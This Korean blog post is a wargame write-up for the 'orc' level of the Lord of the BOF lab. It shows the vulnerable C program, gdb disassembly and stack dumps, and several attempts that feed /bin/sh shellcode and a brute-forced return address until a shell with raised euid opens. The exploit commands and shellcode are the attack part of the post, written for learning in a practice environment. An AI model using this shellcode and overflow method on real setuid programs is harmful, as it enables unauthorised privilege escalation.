반응형

/* 1. 소스코드를 확인합니다. */

/* 소스코드를 복사해 복사본을 만들어주시기 바랍니다. 여기서는 orx가 그 경우입니다.*/

[goblin@localhost goblin]$ cat orc.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - orc

        - egghunter

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


main(int argc, char *argv[])

{

char buffer[40];

int i;


if(argc < 2){

printf("argv error\n");

exit(0);

}


// egghunter 

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));


if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}


strcpy(buffer, argv[1]); 

printf("%s\n", buffer);

}


/* 2. \xff가 인식되도록 bash2를 사용합니다. */

[goblin@localhost goblin]$ bash2


/* 3. 그냥 찾다가 얻은 리턴어드레스로 해봅니다.*/

[goblin@localhost goblin]$ ./orc `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11'` `perl -e 'print "\x90"x9, "\xac\xfa\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€??????????? //안되네여.


/* 4. gdb로 까서 주소를 얻어보았습니다. call strcpy에 브포를 걸고 `perl -e 'print"\x90"x47, "\xbf"'`이런식으로 48번째 바이트에 \xbf를 넣고 구경하다보니 나왔습니다(기억안남ㅋ;;;) */

[goblin@localhost goblin]$ ./orx `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x48\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????H?

Illegal instruction (core dumped)


[goblin@localhost goblin]$ gdb -q orx 

(gdb) disas main

Dump of assembler code for function main:

0x8048500 <main>: push   %ebp

0x8048501 <main+1>: mov    %esp,%ebp

0x8048503 <main+3>: sub    $0x2c,%esp

0x8048506 <main+6>: cmpl   $0x1,0x8(%ebp)

0x804850a <main+10>: jg     0x8048523 <main+35>

0x804850c <main+12>: push   $0x8048640

0x8048511 <main+17>: call   0x8048410 <printf>

0x8048516 <main+22>: add    $0x4,%esp

0x8048519 <main+25>: push   $0x0

0x804851b <main+27>: call   0x8048420 <exit>

0x8048520 <main+32>: add    $0x4,%esp

0x8048523 <main+35>: nop    

0x8048524 <main+36>: movl   $0x0,0xffffffd4(%ebp)

0x804852b <main+43>: nop    

0x804852c <main+44>: lea    0x0(%esi,1),%esi

0x8048530 <main+48>: mov    0xffffffd4(%ebp),%eax

0x8048533 <main+51>: lea    0x0(,%eax,4),%edx

0x804853a <main+58>: mov    0x8049764,%eax

0x804853f <main+63>:         cmpl   $0x0,(%eax,%edx,1)

0x8048543 <main+67>: jne    0x8048547 <main+71>

0x8048545 <main+69>: jmp    0x8048587 <main+135>

0x8048547 <main+71>: mov    0xffffffd4(%ebp),%eax

0x804854a <main+74>: lea    0x0(,%eax,4),%edx

0x8048551 <main+81>: mov    0x8049764,%eax

0x8048556 <main+86>: mov    (%eax,%edx,1),%edx

0x8048559 <main+89>: push   %edx

0x804855a <main+90>: call   0x80483f0 <strlen>

0x804855f <main+95>:  add    $0x4,%esp

0x8048562 <main+98>: mov    %eax,%eax

0x8048564 <main+100>: push   %eax

0x8048565 <main+101>: push   $0x0

0x8048567 <main+103>: mov    0xffffffd4(%ebp),%eax

---Type <return> to continue, or q <return> to quit---

0x804856a <main+106>: lea    0x0(,%eax,4),%edx

0x8048571 <main+113>: mov    0x8049764,%eax

0x8048576 <main+118>: mov    (%eax,%edx,1),%edx

0x8048579 <main+121>: push   %edx

0x804857a <main+122>: call   0x8048430 <memset>

0x804857f <main+127>: add    $0xc,%esp

0x8048582 <main+130>: incl   0xffffffd4(%ebp)

0x8048585 <main+133>: jmp    0x8048530 <main+48>

0x8048587 <main+135>: mov    0xc(%ebp),%eax

0x804858a <main+138>: add    $0x4,%eax

0x804858d <main+141>: mov    (%eax),%edx

0x804858f <main+143>: add    $0x2f,%edx

0x8048592 <main+146>: cmpb   $0xbf,(%edx)

0x8048595 <main+149>: je     0x80485b0 <main+176>

0x8048597 <main+151>: push   $0x804864c

0x804859c <main+156>: call   0x8048410 <printf>

0x80485a1 <main+161>: add    $0x4,%esp

0x80485a4 <main+164>: push   $0x0

0x80485a6 <main+166>: call   0x8048420 <exit>

0x80485ab <main+171>: add    $0x4,%esp

0x80485ae <main+174>: mov    %esi,%esi

0x80485b0 <main+176>: mov    0xc(%ebp),%eax

0x80485b3 <main+179>: add    $0x4,%eax

0x80485b6 <main+182>: mov    (%eax),%edx

0x80485b8 <main+184>: push   %edx

0x80485b9 <main+185>: lea    0xffffffd8(%ebp),%eax

0x80485bc <main+188>: push   %eax

0x80485bd <main+189>: call   0x8048440 <strcpy>

0x80485c2 <main+194>: add    $0x8,%esp

0x80485c5 <main+197>: lea    0xffffffd8(%ebp),%eax

0x80485c8 <main+200>: push   %eax

0x80485c9 <main+201>: push   $0x8048669

0x80485ce <main+206>: call   0x8048410 <printf>

---Type <return> to continue, or q <return> to quit---

0x80485d3 <main+211>: add    $0x8,%esp

0x80485d6 <main+214>: lea    0xffffffd8(%ebp),%eax

0x80485d9 <main+217>: push   %eax

0x80485da <main+218>: push   $0x804866d

0x80485df <main+223>: call   0x8048410 <printf>

0x80485e4 <main+228>: add    $0x8,%esp

0x80485e7 <main+231>: leave  

0x80485e8 <main+232>: ret    

0x80485e9 <main+233>: nop    

0x80485ea <main+234>: nop    

0x80485eb <main+235>: nop    

0x80485ec <main+236>: nop    

0x80485ed <main+237>: nop    

0x80485ee <main+238>: nop    

0x80485ef <main+239>: nop    

End of assembler dump.


/* 5. strcpy 브포. */

(gdb) b *main+189

Breakpoint 1 at 0x80485bd

(gdb) r `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x65\xfc\x90\xbf"'`

Starting program: /home/goblin/orx `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x65\xfc\x90\xbf"'`


Breakpoint 1, 0x80485bd in main ()

(gdb) x/50wx $esp

0xbffffb6c: 0xbffffdbd    0xbffffddb    0xbffffdf3     0xbffffdfe

0xbffffb7c: 0xbffffe0f     0xbffffe20    0xbffffe28     0x00000000

0xbffffb8c: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffb9c: 0x00000005 0x00000006 0x00000006 0x00001000

0xbffffbac: 0x00000007 0x40000000 0x00000008 0x00000000

0xbffffbbc: 0x00000009 0x08048450 0x0000000b 0x000001f7

0xbffffbcc: 0x0000000c 0x000001f7 0x0000000d 0x000001f7

0xbffffbdc: 0x0000000e 0x000001f7 0x00000010 0x0febfbff

0xbffffbec: 0x0000000f 0xbffffc1e     0x00000000 0x00000000

0xbffffbfc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc0c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc1c: 0x36690000 0x2f003638 0x656d6f68 0x626f672f

0xbffffc2c: 0x2f6e696c 0x0078726f

(gdb) 

0xbffffc34: 0x99580b6a    0x2f2f6852     0x2f686873  0x896e6962 //쉘코드가요기잉네

0xbffffc44: 0x895352e3   0x9080cde1 0x90909090 0x90909090  //0xbffffc34?35?

0xbffffc54: 0x90909090 0x90909090 0x90909090 0xbf90fc65

0xbffffc64: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc74: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc84: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc94: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffca4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcb4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcc4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcd4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffce4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcf4: 0x00000000 0x00000000

(gdb) quit

The program is running.  Exit anyway? (y or n) y


/* 6. 복사본에 시도해봅니다.*/

[goblin@localhost goblin]$ ./orx `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x35\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????5?

bash$         //오옹 되넹

bash$ exit

exit


/* 7. 원본에 시도해봅니다. */

[goblin@localhost goblin]$ ./orc `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x35\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????5?

Segmentation fault            //안되네여 하핳ㅎ하핳하하핳

[goblin@localhost goblin]$ ./orc `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x34\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????4?

Illegal instruction


/*이 시점에선 그냥 34~40까지 해보자 하고 끝값을 마구마구 대입했습니다*/

[goblin@localhost goblin]$ ./orc `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x33\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????3?

Segmentation fault

[goblin@localhost goblin]$ ./orc `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x36\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????6?

Illegal instruction

[goblin@localhost goblin]$ ./orc `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x37\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????7?

bash$ my-pass        //결국엔 됬어요.

euid = 504


아하하하하하하 굉장히 많은것을 배웠습니다

gdb에 대한 공포감도 줄이고, 알아낸게 많은 것 같습니다.

중간중간에 좀 안맞지만 (하도 오랫동안 삽질해서 날아간게 좀 많아요) 그래도 뼈대는 있네여. 고치면서 본건데 기억안나는것도 많고,,, 다음에 시간나면 다시 해봐야겠습니다.

이거 푸는동안 조언주신 많은 분들께 감사합니다!

기분좋네요ㅎㅎ


NOTES:


버퍼의 크기는 44

48번쨰 바이트는 \xbf여야 한다


코어는 해당 프로그램이 관리자 권한이 아닐 때 덤프가 떠지지 않는다

음 망했어


0xbffffc48

0xbffffc65

          28

          34

          35


48번째 바이트가 \xbf여야 하니까 3바이트 빼면 45바이트니까 환경변수 4바이트 nop 41바이트

gdb에서 \xff는 인식되지 않는다아앙ㅇ아ㅏㅇ


ㅋㅋ 정신나간 노트가 많습니다. 저 주소값들 어쩔꺼야;;

그래도 풀으니까 속시원하네여. 삽질한 성과가 있는것 같습니다ㅋㅋ

반응형
저작자표시

'STUDY > Lord of the BOF' 카테고리의 다른 글

wolfman->darkelf  (0) 2013.11.21
orc->wolfman  (0) 2013.11.21
cobolt->goblin  (0) 2013.11.01
gremlin->cobolt  (0) 2013.10.30
gate->gremlin  (0) 2013.10.27

+ Recent posts

티스토리툴바